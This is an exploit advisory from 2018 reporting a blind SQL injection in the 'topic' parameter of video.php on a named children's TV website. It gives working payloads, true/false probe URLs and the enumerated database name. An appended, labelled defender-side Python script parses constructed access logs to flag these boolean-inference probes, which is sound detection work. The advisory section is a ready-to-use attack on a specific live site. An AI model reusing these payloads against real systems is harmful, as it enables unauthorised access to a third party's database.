# Exploit Title: Hodhodfarsi.tv SQL Injection Vulnerability
# Exploit Author: kodak
# Date: 2018-11-11
# Vendor Homepage: http://www.hodhodfarsi.tv/
# Category: webapps
# Tested on: Windows and Linux
# CWE: CWE-89
1. Description:
--------------------
Hod hod farsi is an Iranian television channel for children and teenagers.
The website has a SQL injection vulnerability.
2. Exploit/POC:
--------------------
hodhodfarsi.tv/video.php?topic=[SQL Injection]
Parameter: topic (GET)
Location: /video.php
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: topic=1' AND 9002=9002 AND 'kodak'='kodak
Vector: AND [INFERENCE]
Available databases [1]:
[*] hodhodfa_farsi
Is True --> hodhodfarsi.tv/video.php?topic=1' AND 'kodak'='kodak
Is False --> hodhodfarsi.tv/video.php?topic=1' AND 'kodak'='PWRDS
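Added defender-side example, not part of the original advisory: a Python checker that flags requests whose query parameter matches the boolean-inference payloads shown above (quote break, AND/OR, then a numeric or string comparison) and groups them by source so that differing response sizes for true and false probes stand out. The log lines, IP addresses and response sizes are constructed; Common Log Format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not real traffic from the site). Sizes are chosen so the
# "true" probe returns the normal page and the "false" probe a much smaller one.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2018:10:00:01 +0000] "GET /video.php?topic=12 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2018:10:00:02 +0000] "GET /video.php?topic=1%27%20AND%209002%3D9002%20AND%20%27kodak%27%3D%27kodak HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2018:10:00:03 +0000] "GET /video.php?topic=1%27%20AND%20%27kodak%27%3D%27PWRDS HTTP/1.1" 200 312
198.51.100.9 - - [11/Nov/2018:10:00:04 +0000] "GET /video.php?topic=7 HTTP/1.1" 200 4890
"""
# Common Log Format: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3} (?P<size>\d+)')
# A quote that breaks out of a string literal, then AND/OR, then a comparison of either a
# numeric pair (9002=9002) or a string pair ('kodak'='kodak; the closing quote comes from
# the application's own query, so it is not required here).
INFERENCE_RE = re.compile(r"'\s*(?:and|or)\s+(?:\d+\s*=\s*\d+|'[^']*'\s*=\s*'[^']*)", re.I)


def parse_line(line):
    """Parse one CLF line into ip, path, decoded query params and response size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %27 -> ', %20 -> space
    return {"ip": m.group("ip"), "path": url.path, "params": params, "size": int(m.group("size"))}


def find_inference_probes(log_text):
    """Return (ip, path, param, decoded value, response size) for every request whose
    parameter value matches the boolean-inference pattern."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                if INFERENCE_RE.search(value):
                    hits.append((rec["ip"], rec["path"], name, value, rec["size"]))
    return hits


def response_sizes_by_source(hits):
    """Group flagged requests by (ip, path, param); more than one distinct response size
    for the same source means the page answered true and false probes differently."""
    sizes = {}
    for ip, path, name, _value, size in hits:
        sizes.setdefault((ip, path, name), set()).add(size)
    return sizes
```

Feeding real server logs through `find_inference_probes` and then `response_sizes_by_source` gives a quick triage view of which endpoints and parameters were probed and whether the application leaked a true/false difference.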
3. Screenshot
--------------------
https://imgur.com/a/LRF1Whb
https://imgur.com/a/aCVDkvx